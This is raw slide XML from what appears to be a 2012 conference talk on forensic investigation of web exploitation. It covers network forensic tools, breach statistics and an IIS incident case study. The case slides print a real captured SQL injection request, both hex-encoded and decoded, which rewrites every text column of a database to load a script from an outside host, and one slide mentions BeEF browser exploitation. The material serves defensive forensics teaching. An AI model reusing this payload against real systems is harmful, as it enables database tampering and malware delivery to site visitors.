FLRFhgSU7ux+R7frJf80WjuZcb3LK7q0y3ZemI/QlfvMI7lMSr4e3kfPpXtnTVOh09RNn1d5qK7y1mIqG+SuJe8KeMNf5wcmWpYWkknY0jRdGkUlCJVPLWWg9Bknk3YnLG5OSTzFTXax3wAgDm1Cglz6Qy50tZiNyrC4Nsjn5wDVyqf4rNM/2Ez/zFR/+kTcpwodF9CyaPodPSSStPJlygcnYoBJsBcnknAyYguSEAIAhK3pGhnVJmTaOnd25Zpakn64gLEhpmmyaekEuRKSUgJIVFCi55NhAHXACAKlW9ttNm1RdqcgsbkS5s2Wv4KjhRnOBzmJuUdOD1aR1aT0LQU0wNLpU3gkh3vNcXG3DTCWAt6Xtk+8QWUUtkWOBJWNX7fadU1O+bTLvJJLIzyixbkt4bDcfrAq4xe6JzS9MlU1EJUiWsuWvCqLDPJ+ZPvAsfSto5c6mMuaiujCxVgGBBxkH5QBVG7X6YWP2Di5vYT54Gc4AmWA+Qibs58KD/avoTGg9J0dF/k9OiN+nlnPPLsSx5IyeMRBdJLYmoEiAIDXejKKsnh58gFx+ejNLY88tLIJGTz7wKuMZboj6ftlpiTw3wxYi+Jk2bMXItlXcqefUQuQqcFskWehopcmmEuUiy0UWCoAoFscD5CBc6IAQAgBACAEAIAQAgBACAEAIAQAgBAFN7tD+pr/rE/mi0dzLjO6ZX9aNuzFPxhJX8YLc54jXDL5Fx7ffkTSfqF/hFWa6fwIsMC4gBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAU3u0f6mv+sT+aLR3MuN7plf1cX7NSAMlUlEgZtY5J9oLc512nh9PAuPb38iaT9SsVZrp/AiwwLiAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQBwa3pEqr0x5M4XRh6YIIyGU+hByIFZRUlZmeHs4PDt8fOzz9mkWzMz/oqN72L901ocui0WXTyixVAcsblixLMT9WJNhgRU0pJKyJSBIgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAIAQAgBACAEAf/9k="/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="155575" y="-693738"/>
            <a:ext cx="4171950" cy="1457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66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15000" y="2952750"/>
            <a:ext cx="130884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Picture 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77000" y="3638550"/>
            <a:ext cx="2195512" cy="98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66928" y="971550"/>
            <a:ext cx="5486400" cy="3657634"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DataEcho (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://sourceforge.net/projects/data-echo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EtherPeg (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.etherpeg.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drifnet ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://freshmeat.net/projects/driftnet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Good Article on How to do it in open source:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.forensicfocus.com/open-source-network-forensics-appliance-howto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p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Open Source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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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3562350"/>
            <a:ext cx="34575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66928" y="1047750"/>
            <a:ext cx="5486400" cy="3581434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How to Record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B9AB1BC5-8244-4997-9202-6D7E7DEA20BF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457200" y="742950"/>
          <a:ext cx="6858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66928" y="971550"/>
            <a:ext cx="5486400" cy="3657634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>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Commercial Network Forensic Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Netwitness Investigator, Niksun NetVCR, WildPackets OmniPeak, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access Data S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ilentRunner, Guidance Software Encase Enterprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uild - open- source tools, custom signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Review, Tcpdump, Ethereal, Tcpextract, Vomit, Voipong, Chaosreader, Tcpick, Tcptrace, Tcpflow, Tcpreplay, Ssldump, AIM Sniff, Ettercap, Xplico, UCSniff, NetworkMiner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Often integrated in IDS, IPS, HoneyPots </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Snort, Kfsensor, Honeyd, Specter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Losses documentation – NIC, kernel, switch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Examiner action logging</a:t>
            </a:r>
          </a:p>
          <a:p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Network Forensics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B9AB1BC5-8244-4997-9202-6D7E7DEA20BF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Protocol IPv4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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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Content Placeholder 7" descr="tracing-7129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590550"/>
            <a:ext cx="6096000" cy="4206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OSI Model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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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Content Placeholder 5" descr="osi-model-7-laye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590549"/>
            <a:ext cx="3657600" cy="4227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Xplicco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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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28" name="Picture 4" descr="http://www.xplico.org/wp-content/uploads/2010/01/anns_increment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66750"/>
            <a:ext cx="8467725" cy="401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Xplico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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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4818" name="Picture 2" descr="http://1.bp.blogspot.com/_qZEkCb2gD48/S9HwiCKZtoI/AAAAAAAACu0/Eo5W3MJotuY/s1600/xplic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66750"/>
            <a:ext cx="6172200" cy="4075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Chaosreader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B9AB1BC5-8244-4997-9202-6D7E7DEA20BF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7890" name="Picture 2" descr="http://foren6.files.wordpress.com/2009/12/screenshot-chaosreader-report-evidence02-pcap-mozilla-firefo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42950"/>
            <a:ext cx="5257800" cy="3903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I do - Digital Firefighters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cyber jobs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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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050" name="Picture 2" descr="http://digitalscrapbookpreviews.com/gallery/data/500/KDOM_FirefighterK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352550"/>
            <a:ext cx="3257550" cy="325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Chaosreader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B9AB1BC5-8244-4997-9202-6D7E7DEA20BF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5844" name="Picture 4" descr="Example GET/POST repo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95350"/>
            <a:ext cx="5033881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Tips for Businesses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B9AB1BC5-8244-4997-9202-6D7E7DEA20BF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457200" y="742950"/>
          <a:ext cx="7086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36DEF0-4354-4AAC-950B-4F6FBE4D5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F436DEF0-4354-4AAC-950B-4F6FBE4D5E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FB620C-BE80-45B0-A06E-858A5D99B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49FB620C-BE80-45B0-A06E-858A5D99B4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Contacts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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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1981200" y="2038350"/>
            <a:ext cx="6208713" cy="18716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Ondrej Krehel, CISSP, CEH, Information Security Officer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Lifars, LLC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Email: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AA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2"/>
              </a:rPr>
              <a:t>krehel@lifars.com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AA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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 9" descr="Untitle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885950"/>
            <a:ext cx="1219200" cy="124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66928" y="895350"/>
            <a:ext cx="5486400" cy="373383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 &amp; C – Command and Control Channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VOIP – Voice over Internet Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL – Structured Query Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MFT- Master File Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS – Domain Name System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>P2P – Peer-to-peer networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UPX – Ultimate Packer for eXecutables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CAST – Encoding and SQL function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MRU – Most Recently Used section in Windows registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IDS/IPS – Intrusion Detection/Prevention Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LKM – Loadable Kernel Module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IM – Instant Messaging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TCP/UPD – Common transfer protocols</a:t>
            </a:r>
          </a:p>
          <a:p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Abbreviations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B9AB1BC5-8244-4997-9202-6D7E7DEA20BF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Hexadecimal Encoding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Abbreviations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B9AB1BC5-8244-4997-9202-6D7E7DEA20BF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b="412"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533399" y="1504950"/>
            <a:ext cx="4006223" cy="2656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Web server in the DMZ zone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Inbound is filtered, however outbound is not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Server is running un-patched version of IIS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Incident occurred ?!? - need to confirm it and if yes, incident response and investigation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Recorded traffic file is available – pcap format, however we don’t have any logs, neither from firewall or web server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We want to what happened and if we can find traces of commands as well as malware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1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Wireshark analysis will be presented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Case from cyber field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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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8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2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1295400" y="1352550"/>
          <a:ext cx="5834062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by Breach – All time</a:t>
            </a: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DatalossDB.org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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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Web attacks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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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Grp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect r="14368"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="666750"/>
            <a:ext cx="629208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68620" y="1532554"/>
            <a:ext cx="6517979" cy="3136392"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1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2011 Second Annual Cost of Cyber Crime Study </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Ponemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> Institute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	An average web-based attack costs $143, 209; malicious </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>code, $124,083; and malicious insiders, $100,300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>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Web-borne attacks, malicious code and insiders are the most costly, making up more than 90% of all cybercrime costs per organization per year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published study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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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266950"/>
            <a:ext cx="2183653" cy="214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33400" y="1047750"/>
            <a:ext cx="7315200" cy="3581400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sz="3600" dirty="0" smtClean="0"/>
              <a:t>GET /home/site_content_3.asp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C0061007200650</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>0200040006D00200076006100720063006800610072002800380030003000300029003B007300650</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>07400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>02B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>07300650074005B0027002B0062002E006E0061006D0065002B0027005D003D00720074007200690</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>06D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>027002000660072006F006D002000640062006F002E007300790073006F0062006A0065006300740</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>07300200061002C00640062006F002E0073007900730063006F006C0075006D006E0073002000620</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>02C00640062006F002E0073007900730074007900700065007300200063002000770068006500720</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>06500200061002E00690064003D0062002E0069006400200061006E006400200061002E007800740</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>07900700065003D0027005500270061006E006400200062002E00780074007900700065003D00630</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>02E0078007400790070006500200061006E006400200063002E006E0061006D0065003D002700760</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>061007200630068006100720027003B00730065007400200040006D003D005200450056004500520</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D00520</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>0450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>0%20AS%20NVARCHAR(4000));EXEC(@S);--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 GET – RFC 2616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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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33400" y="1047750"/>
            <a:ext cx="6781800" cy="3581400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 smtClean="0"/>
              <a:t>CAST obfuscated data, after decoding:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>declare @m varchar(8000);set @m='';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select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+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''&lt;script src="http://yl18.net/0.js"&gt;&lt;/script&gt;''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>;'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where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a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>';set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);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 GET Decoded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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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33400" y="1047750"/>
            <a:ext cx="6781800" cy="35814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BeEF exploitation of the victim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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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71550"/>
            <a:ext cx="7010400" cy="371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26877">
            <a:off x="4916682" y="2704684"/>
            <a:ext cx="3795482" cy="101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IC-2012_De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6002</TotalTime>
  <Words>742</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>140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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>CEIC-2012_Deck</vt:lpstr>
      <vt:lpstr>Forensic Investigations of Web Exploitations</vt:lpstr>
      <vt:lpstr>What do I do - Digital Firefighters</vt:lpstr>
      <vt:lpstr>Scenario:</vt:lpstr>
      <vt:lpstr>Incident by Breach – All time</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The first published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Hexadecimal Encoding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2012-03-20T14:46:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-20T15:18:34Z</dcterms:modified>
</cp:coreProperties>
</file>